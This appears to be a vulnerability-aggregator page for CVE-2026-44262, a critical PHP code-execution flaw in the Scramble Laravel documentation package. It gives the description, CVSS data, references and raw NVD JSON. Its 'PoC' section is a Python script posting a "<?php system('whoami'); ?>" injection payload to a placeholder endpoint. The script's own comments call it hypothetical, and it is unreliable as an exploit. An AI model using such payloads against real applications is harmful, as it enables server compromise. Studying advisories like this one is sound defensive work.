CVE-2026-44262

Description

Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22.

CVSS Details

CVSS Score

9.4

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

dedoc/scramble >= 0.13.2, < 0.13.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Vulnerable endpoint)
target_url = "http://vulnerable-app.com/api/test"

# Hypothetical payload exploiting the validation rule evaluation
# Assuming the backend uses request()->input('rule') in validation
payload = {
    "input_field": "some_value",
    "malicious_rule": "<?php system('whoami'); ?>" 
}

try:
    response = requests.post(target_url, data=payload)
    print(f"Request sent to {target_url}")
    print("If the documentation generation is triggered, the code may execute.")
    print("Response status:", response.status_code)
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44262
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44262
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44262/
[4] VulDB https://vuldb.com/cve/CVE-2026-44262
[5] https://github.com/dedoc/scramble/releases/tag/v0.13.22
[6] https://github.com/dedoc/scramble/security/advisories/GHSA-4rm2-28vj-fj39

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44262", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:36.563", "lastModified": "2026-05-12T22:16:36.563", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/dedoc/scramble/releases/tag/v0.13.22", "source": "[email protected]"}, {"url": "https://github.com/dedoc/scramble/security/advisories/GHSA-4rm2-28vj-fj39", "source": "[email protected]"}]}}